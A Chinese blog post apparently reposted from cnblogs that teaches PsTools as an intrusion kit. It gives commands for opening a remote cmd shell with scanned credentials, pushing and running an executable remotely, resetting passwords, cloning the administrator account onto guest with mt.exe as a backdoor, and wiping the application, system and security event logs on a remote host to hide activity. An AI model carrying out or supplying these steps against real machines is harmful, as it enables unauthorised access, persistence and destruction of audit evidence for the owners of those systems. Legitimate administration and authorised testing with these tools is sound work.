• Pstools使用


    pstool的介绍
    
    PsTools是Sysinternals Suite中一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools中含有12款各式各样的小工具。如果将它们灵活的运用,将会在渗透中收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。
    
    还有所有的pstool都支持IP$,一旦IP$共享是连接的就不用输入-u 和-p这两个参数。
    
    如何建立IP$连接。命令如下:
    
    Net user \目标ip 密码 /user:用户
    
    Net user \192.168.1.3 123456 /user:test
    
    建立后所有的ps工具都将可以不用输入用户和密码了。
    
    其中12款工具简介如下:
    
    ◆PsExec - 远程执行进程
    
    ◆PsFile - 显示远程打开的文件
    
    ◆PsGetSid - 显示计算机或用户的 SID
    
    ◆PsInfo - 列出有关系统的信息
    
    ◆PsKill - 按名称或进程 ID 终止进程
    
    ◆PsList - 列出有关进程的详细信息
    
    ◆PsLoggedOn - 查看在本地通过资源共享(包含所有资源)登录的用户
    
    ◆PsLogList - 转储事件日志记录
    
    ◆PsPasswd - 更改帐户密码
    
    ◆PsService - 查看和控制服务
    
    ◆PsShutdown - 关闭并重新启动(可选)计算机
    
    ◆PsSuspend - 暂停进程
    
    

     Psexec 介绍

    远程获取一个cmdshell
    
    比如我再渗透中扫描到目标机(192.168.1.3)的一个用户名(test)和密码(123456)。
    
    那我们的命令就是:
    
    psexec \目标ip -u 用户名 -p 密码 进程名
    
    psexec \192.168.0.109 –u test –p 123456 cmd.exe
    exit退出

    这里看见不能空密码进行连接

    限制 比guest权限大的用户都能登陆
     PsExec \192.168.0.109 -u administrator -p 123456 -c k:ss.exe

    pspasswd的应用详解
    pspasswd \192.168.0.109 -u administrator -p 123456 guest 123456  用administrator改guest的密码
    

     

    pspassword妙用

    首先执行D:web|pspasswd.exe –accepteula (第一次执行,表示许可执行的意思)
    
    D:web|pspasswd.exe administrator yueyan
    
    就会成功修改administrator的密码。
    
    这里能修改密码的原因是pspasswd不是调用net.exe进行密码修改。
    
    上述介绍常常配合mt.exe进行用户克隆。这里简单介绍:
    
    (关于mt.exe的详细介绍请访问:【工具】mt.exe的详细介绍)
    首先mt.exe查看用户sid,比较后看是否有克隆账户

    Mt -chkuser

    比较后,没有克隆账户,我们选择guest这个账户进行克隆:

    Mt –clone administrator guest

    然后配合pspasswd修改密码:

    Pspasswd guest yueyan

    就这样成功克隆一个账户,并能成功登陆访问。

    pskill+psinfo+pslist的应用详解
    pskill \192.168.0.109 -u administrator -p 123456 cmd.exe
    我再介绍psinfo的相关应用。
    
    基本参数是:
    
    -h 显示已经安装的补丁信息
    
    -s 显示已安装的软件信息
    
    -d 显示磁盘信息
    
    如果我们想看远程主机的基本信息,命令如下:
    
    psinfo –h –s –d \192.168.1.3 –u administrator –p 123456
    
    PSLOGGEDON:查看指定计算机的本地及远程登录的用户和登录时间。必须建立在IP$共享下才可以使用这个工具。
    其他ps工具介绍:
    
    PSLOGGEDON:查看指定计算机的本地及远程登录的用户和登录时间。必须建立在IP$共享下才可以使用这个工具。
    
    命令如下:
    
    Psloggedon –l \192.168.1.3
    
    PSLOGLIST:事件日志转储及管理。
    
    这个对于渗透测试是非常有用的,它最大的特点就是远程清理系统日志。
    
    常用:
    
    psloglist \72.56.17.74 application -c > nul
    
    psloglist \72.56.17.74 system -c > nul
    
    psloglist \72.56.17.74 security -c > nul
    
    分别是清理应用程序日志,系统运行日志,安全日志。
    
    PSSERVICE:管理服务。
    
    常用:
    
    psservice query messenger
    
    查询messenger服务的相关信息。
    
    最重要的项目是:服务名称、显示名称、服务描述、服务类型、服务状态。
    
    psservice config messenger
    
    查询服务的配置信息。
    
    最重要的项目是:服务名称、服务描述、服务类型、服务启动类型、服务错误控制级别、可执行文件的路径等等。
    
    PSSHUTDOWN:关机工具。
    
    常用命令:
    
    Psshutdown –s –t 60
    
    60秒后关机。
    
    下面几个不常用,就介绍下:
    
    PsFile - 显示远程打开的文件
    
    Psfile \192.168.1.3
    
    PsGetSid - 显示计算机或用户的 SID
    
    Psgetsid \192.168.1.3
    
    PsSuspend - 暂停进程
    
    Pssuspend \192.168.1.3 –u test –p 123456 cmd,exe
  • 相关阅读:
    python 测试日志的简单写法
    selenium web端滑动页面查找元素
    selenium之内嵌网页iframe切换
    selenium多窗口切换,及其关闭
    selenium 双击操作右击操作鼠标悬停
    selenium web元素定位合集
    三大浏览器的驱动地址
    app 怎么区分是原生
    django 处理图片上传
    django时区问题
  • 原文地址:https://www.cnblogs.com/-zhong/p/11743489.html
Copyright © 2020-2023  润新知